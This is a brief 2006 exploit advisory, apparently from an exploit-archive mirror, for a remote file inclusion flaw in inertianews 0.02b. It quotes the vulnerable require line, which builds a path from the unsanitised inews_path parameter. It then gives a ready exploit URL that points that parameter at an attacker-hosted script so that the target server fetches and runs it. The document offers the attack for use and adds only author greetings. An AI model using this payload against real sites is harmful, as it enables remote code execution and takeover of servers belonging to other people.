[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : inertianews 0.02b (inertianews_main.php) Remote Include Vulnerability
# Published : 2006-12-21
# Author : bd0rk
# Previous Title : Ixprim CMS 1.2 Remote Blind SQL Injection Exploit
# Next Title : MKPortal M1.1.1 (Urlobox) Cross Site Request Forgery Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ +
+ inertianews 0.02b Remote File Include Vulnerability +
+ +
+ Found3R: bd0rk || SOH-Crew +
+ +
+ eMail: bd0rk[at]hackermail.com +
+ +
+ Greetz: str0ke, TheJT, Axel H., Carsten S. +
+ +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download: http://www.brentc.com/inertianews/download/inertianews02b.zip
=> Vulnerable Code in inertianews_main.php <=
Code: require ("$inews_path/inertia_sql_class.php");
[+]Exploit: http://[host]/[inertia_dir]/inertianews_main.php?inews_path=http://[TroubleScript]
Special-Greetz: ajann, Kacper, Google-Team :-)
# www.Syue.com [2006-12-21]